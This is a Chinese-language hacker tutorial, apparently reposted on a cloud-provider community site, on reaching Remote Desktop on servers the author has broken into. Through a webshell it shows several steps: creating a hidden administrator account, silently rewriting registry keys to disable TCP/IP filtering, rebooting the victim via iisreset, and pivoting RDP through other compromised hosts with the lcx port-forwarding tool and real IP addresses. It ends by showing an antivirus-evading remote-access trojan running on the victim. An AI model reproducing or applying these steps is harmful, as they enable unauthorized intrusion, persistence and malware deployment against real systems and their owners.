3389串連出錯的解決辦法

來源:互聯網
上載者:User
權過程中,伺服器開了3389卻串連不上的處理:
大家好,我是黑白貿易(qq:396418270)
我們雖然取得了超級管理員權限,也開了3389連接埠,但卻串連不上!可能的原因:
1、可能設定了tcp/ip過濾
2、3389連接埠改了
3、內網原因
4、其他原因
下面看我這種情況!

我已經提權建立了超級使用者! fengyun$

看看能不能串連

用戶端無法串連到服務端

看看是否過濾了ip

第1種情況的解決辦法是通過修改註冊表方法如下:
我們要做的就是匯出他註冊表的三處,更改後再匯入就可以了,回到〖Ws cript.Shell〗執行cmd命令:
regedit -e c:/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Services/Tcpip
匯出註冊表裡關於TCP/IP篩選的第一處
regedit -e c:/2.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet002/Services/Tcpip
匯出註冊表裡關於TCP/IP篩選的第二處
regedit -e c:/3.reg HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Tcpip
#匯出註冊表裡關於TCP/IP篩選的第三處

把1.reg,2.reg,3.reg下載回來到自己的硬碟裡面編輯一下,把關於TCP/IP篩選的幾個地方改一下

首先開啟1.reg找到"EnableSecurityFilters"=dword:00000001把最後面的數字1改成0後儲存,
然後更改2.reg,3.reg,更改方法一樣,我就不再羅嗦了~
我查看了一下 1.reg 中的"EnableSecurityFilters"=dword:00000000 開來沒有設定tcp/ip 過濾
為了完整期間,我看看2和3 "EnableSecurityFilters"=dword:00000000
 最後的數值都為0看來第1種情況也不滿足
如果滿足的話我們就按以下我說的去做!

然後我們把1.reg,2.reg,3.reg再上傳回對方的機器裡面(這裡我們要選上覆蓋模式,因為沒有權
限刪除原來的1.reg,2.reg,3.reg),上傳成功後再回到〖Ws cript.Shell〗執行cmd命令:
regedit -s c:/1.reg #安靜模式下把我們修改完的1.reg匯入到他的註冊表
regedit -s c:/2.reg #安靜模式下把我們修改完的2.reg匯入到他的註冊表
regedit -s c:/3.reg #安靜模式下把我們修改完的3.reg匯入到他的註冊表
OK!匯入後重新啟動他的機器後在能解決TCP/IP篩選問題,
再在〖Ws cript.Shell〗執行cmd命令iisreset /reboot /timeout:00"
#利用他自身的iis服務來重新啟動他的機器

第2種情況:用 終端連接埠-自動登入 查看一下 然後用ip:連接埠串連 例如:61.235.153.16:3457

第3種情況和第4種情況可以用lcx連接埠轉寄工具實現!
首先我們要先上傳lcx.exe  這裡我已經傳好了!
第一條和第三配合使用。如在本機上監聽 -listen 51 3389,在肉雞上運行-slave 本機ip 51 肉雞ip 3389

那麼在本地連127.0.1就可以連肉雞的3389.第二條是本機轉向。如-tran 51 127.0.0.1 3389 ==========

這是工具的用法:但需要一台外網機器
[Usage of Packet Transmit:]

  c:/lcx.exe -<listen|tran|slave> <option> [-log logfile]

[option:]
  -listen <ConnectPort> <TransmitPort>
  -tran   <ConnectPort> <TransmitHost> <TransmitPort>
  -slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

這是我的ip  Connection-specific DNS Suffix  . :
  IP Address. . . . . . . . . . . . : 10.0.0.132
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : 10.0.0.138
是內網,還的映射,所以我就用別的肉雞代替吧!218.58.79.21 就用這個吧!!
把我的lcx傳上去! 這台機器超過串連數了
我處理一下
看看能不能上去
好了進入,我們接著操作!!
首先在webshell 上我們執行這個命令
c:/lcx.exe -slave 218.58.79.21 550 127.0.0.1 3389
然後到218.58.79.21 裡面執行先面操作,
暈 沒反映!!
幸虧我還沒在webshell 上執行第一步!
換一個吧!!

不好意思還得把工具傳到上面去
好這次可以!!
需要把 218.58.79.21 改成 現在的 61.235.153.16
好現在 肉雞上的webshell 已經執行了
 Listening port 550 ......
 Listen OK!
 Listening port 880 ......
 Listen OK!
 Waiting for Client on port:550 ......
 Accept a Client on port 550 from 218.56.9
 Waiting another Client on port:880....

執行成功 繼續看我操作
用系統本身帶的3389連接器串連,用別的不行!!
可能 61.235.153.16 有串連限制,現在我用自己的連一下吧

應該可以了
webshell 有問題,耽誤大家時間了, 我又實驗了一次,這次成功了,可能是 webshell 執行命令逾時了
我們去看看!
裝著瑞星殺毒軟體!!
2.4cpu 1G 記憶體 機器一般!!
看到我們匯出的註冊表了吧!!
1.exe是我免殺的鴿子!!

看看免殺不??殺記憶體!!怎麼樣沒被殺掉 吧!!
好了 教程就到這裡吧!!耽誤了大家不少時間!有問題的可聯絡我的QQ:396418270(

其實內網也可以實現這點的,這裡我就不示範了, 希望大家能學習到新的東西!!
88
在這裡感謝 給我提供這個webshell 的好友 不過我忘記是那位了,希望這位朋友聯絡我,我把這個伺服器換給他.over 

 

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.